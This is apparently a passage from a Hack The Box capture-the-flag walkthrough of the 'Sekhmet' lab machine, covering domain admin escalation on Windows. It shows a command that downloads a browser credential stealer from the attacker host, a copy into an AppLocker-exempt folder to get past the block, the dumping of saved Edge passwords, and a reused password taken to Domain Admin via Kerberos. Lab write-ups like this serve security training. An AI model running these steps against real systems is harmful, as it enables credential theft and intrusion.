Get Administrator
Bob.Wood is an IT admin, not a domain admin:
*Evil-WinRM* PS C:\Users\Bob.Wood\Documents> net user Bob.Wood
User name Bob.Wood
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/2/2022 12:42:15 PM
Password expires Never
Password changeable 5/3/2022 12:42:15 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/19/2023 6:00:11 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Adminusers *IT
*Domain Users
The command completed successfully.
But there is also a Bob.Woodadm account that sits in the Domain Admins group:
*Evil-WinRM* PS C:\Users\Bob.Wood\Documents> net user bob.woodadm
User name bob.woodadm
Full Name Bob Wood - Admin
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/4/2022 7:43:11 PM
Password expires Never
Password changeable 5/5/2022 7:43:11 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Protected Users *Domain Admins
*Domain Users
The command completed successfully.
Password reuse is a possibility, but the current password isn't it; perhaps another password of this user is stored somewhere on the machine. Trying to grab browser credentials with hackbrowser.exe triggers an AppLocker block:
*Evil-WinRM* PS C:\programdata> iwr http://10.10.16.3/hackbrowser.exe -outfile m.exe
*Evil-WinRM* PS C:\Users\Bob.Wood\Documents> .\m.exe
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
Program 'm.exe' failed to run: This program is blocked by group policy. For more information, contact your system administrator
At line:1 char:1
+ .\m.exe
+ ~~~~~~~.
At line:1 char:1
+ .\m.exe
+ ~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
malloc_consolidate(): unaligned fastbin chunk detected
zsh: IOT instruction (core dumped) proxychains evil-winrm -i hope.windcorp.htb -r windcorp.htb
Look for a directory that AppLocker does not restrict:
*Evil-WinRM* PS C:\Users\Bob.Wood\Documents> cp m.exe c:\windows\debug\wia
*Evil-WinRM* PS C:\Users\Bob.Wood\Documents> cd c:\windows\debug\wia
*Evil-WinRM* PS C:\windows\debug\wia> ls
Directory: C:\windows\debug\wia
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/19/2023 6:30 AM 8162816 m.exe
-a---- 5/1/2022 11:45 PM 3291 wiatrace.log
*Evil-WinRM* PS C:\windows\debug\wia> .\m.exe
[NOTICE] [browser.go:47,pickChromium] find browser Chromium failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser OperaGX failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Brave failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Yandex failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser 360speed failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser QQ failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Chrome failed, profile folder does not exist
[NOTICE] [browser.go:51,pickChromium] find browser Microsoft Edge success
[NOTICE] [browser.go:53,pickChromium] find browser microsoft_edge_default success
[NOTICE] [browser.go:47,pickChromium] find browser Vivaldi failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser CocCoc failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Chrome Beta failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Opera failed, profile folder does not exist
[NOTICE] [browser.go:91,pickFirefox] find browser firefox Firefox failed, profile folder does not exist
[NOTICE] [browsingdata.go:71,Output] output to file results/microsoft_edge_default_cookie.csv success
[NOTICE] [browsingdata.go:71,Output] output to file results/microsoft_edge_default_localstorage.csv success
[NOTICE] [browsingdata.go:71,Output] output to file results/microsoft_edge_default_history.csv success
[NOTICE] [browsingdata.go:71,Output] output to file results/microsoft_edge_default_download.csv success
[NOTICE] [browsingdata.go:71,Output] output to file results/microsoft_edge_default_password.csv success
*Evil-WinRM* PS C:\windows\debug\wia>
*Evil-WinRM* PS C:\windows\debug\wia> cd results
*Evil-WinRM* PS C:\windows\debug\wia\results> ls
Directory: C:\windows\debug\wia\results
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/19/2023 6:42 AM 12818 microsoft_edge_default_cookie.csv
-a---- 4/19/2023 6:42 AM 229 microsoft_edge_default_download.csv
-a---- 4/19/2023 6:42 AM 1096 microsoft_edge_default_history.csv
-a---- 4/19/2023 6:42 AM 10130 microsoft_edge_default_localstorage.csv
-a---- 4/19/2023 6:42 AM 373 microsoft_edge_default_password.csv
*Evil-WinRM* PS C:\windows\debug\wia\results>
*Evil-WinRM* PS C:\windows\debug\wia\results> cat microsoft_edge_default_password.csv
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
UserName,Password,LoginURL,CreateDate
[email protected],smeT-Worg-wer-m024,http://webmail.windcorp.com/login.html,2022-05-04T18:46:59.133335+02:00
[email protected],SomeSecurePasswordIGuess!09,http://google.com/login.html,2022-05-04T18:14:00.217981+02:00
[email protected],SemTro¤32756Gff,http://somewhere.com/login.html,2022-05-04T18:12:42.849216+02:00
malloc_consolidate(): unaligned fastbin chunk detected
Request a ticket as bob.woodADM with smeT-Worg-wer-m024:
$ proxychains kinit bob.woodADM
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
Password for [email protected]:
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
$ proxychains evil-winrm -i hope.windcorp.htb -r windcorp.htb
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
*Evil-WinRM* PS C:\Users\bob.woodadm\Documents>
Get root.txt:
$ proxychains evil-winrm -i hope.windcorp.htb -r windcorp.htb
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:88 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
*Evil-WinRM* PS C:\Users\bob.woodadm\Documents> cd ../desktop
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
[proxychains] Dynamic chain ... 127.0.0.1:1080 ... hope.windcorp.htb:5985 ... OK
*Evil-WinRM* PS C:\Users\bob.woodadm\desktop> ls
*Evil-WinRM* PS C:\Users\bob.woodadm\desktop> cd ..
*Evil-WinRM* PS C:\Users\bob.woodadm> cd ..
*Evil-WinRM* PS C:\Users> cd administrator
*Evil-WinRM* PS C:\Users\administrator> cd desktop
*Evil-WinRM* PS C:\Users\administrator\desktop> ls
Directory: C:\Users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/19/2023 5:02 AM 34 root.txt
*Evil-WinRM* PS C:\Users\administrator\desktop> type root.txt
Originally published on the WeChat public account 老鑫安全: HTB Walkthrough Sekhmet